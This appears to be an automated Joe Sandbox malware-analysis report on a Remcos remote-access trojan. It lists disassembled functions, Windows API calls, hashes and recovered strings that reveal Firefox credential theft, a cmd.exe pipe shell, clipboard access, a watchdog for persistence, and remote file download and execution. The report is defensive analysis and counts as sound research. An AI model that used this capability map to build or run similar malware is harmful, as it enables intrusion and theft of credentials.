                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 796 41c516-41c53a CreateFileW 797 41c540-41c571 GetFileSize call 40244e call 401fab ReadFile 796->797 798 41c53c-41c53e 796->798 804 41c573 797->804 805 41c575-41c57c CloseHandle 797->805 799 41c57e-41c582 798->799 804->805 805->799
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3919263394-0
                                                                                                                                                • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                                                                                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                                • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                                                                                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                                Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 806 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                                                                                                                APIs
                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                • String ID: SG
                                                                                                                                                • API String ID: 1925916568-3189917014
                                                                                                                                                • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                                                                                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                                                                • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                                                                                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                                                                Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                • Opcode ID: 859e64f62c27df18338a46db6ec3b0787647947da56704c1ae6da14bd80b9033
                                                                                                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                                                • Opcode Fuzzy Hash: 859e64f62c27df18338a46db6ec3b0787647947da56704c1ae6da14bd80b9033
                                                                                                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                                                Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                                Function 00413656 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                                                                                                • RegQueryValueExW.KERNELBASE(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 004136A0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                • Opcode ID: 65d225e62495b603b94ecda2ada9fe67bc436a3b870d946b60a27cc720c1bdd3
                                                                                                                                                • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                                                                                                                • Opcode Fuzzy Hash: 65d225e62495b603b94ecda2ada9fe67bc436a3b870d946b60a27cc720c1bdd3
                                                                                                                                                • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                                                                                                                Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                • RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                • RegCloseKey.KERNELBASE(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1818849710-0
                                                                                                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                                Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                                                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2279764990-0
                                                                                                                                                • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                                • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                                Function 00445B74 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                                                                                • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                                                                                Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                                Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Deallocatestd::_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1323251999-0
                                                                                                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                                                                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                                                                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                                • API String ID: 1067849700-181434739
                                                                                                                                                • Opcode ID: f0bb3cb5b26e90024f3fd42e5bc2004f602a4fcf380aa8fd0aaf15a6088bcc68
                                                                                                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                                                • Opcode Fuzzy Hash: f0bb3cb5b26e90024f3fd42e5bc2004f602a4fcf380aa8fd0aaf15a6088bcc68
                                                                                                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                                                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                                • API String ID: 2994406822-18413064
                                                                                                                                                • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                                                                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                                                                • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                                                                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                                                                Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                  • Part of subcall function 004138B2: RegCloseKey.KERNELBASE(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                • API String ID: 3018269243-13974260
                                                                                                                                                • Opcode ID: 992cc6f92d6e85284a8e701518c9770b8fd1494ee384fb4326f65339fdeae364
                                                                                                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                                                • Opcode Fuzzy Hash: 992cc6f92d6e85284a8e701518c9770b8fd1494ee384fb4326f65339fdeae364
                                                                                                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                                                Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                • API String ID: 1164774033-3681987949
                                                                                                                                                • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                                                                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                                • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                                                                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                                Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                • String ID: !D@
                                                                                                                                                • API String ID: 3520204547-604454484
                                                                                                                                                • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                                                                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                                                • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                                                                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
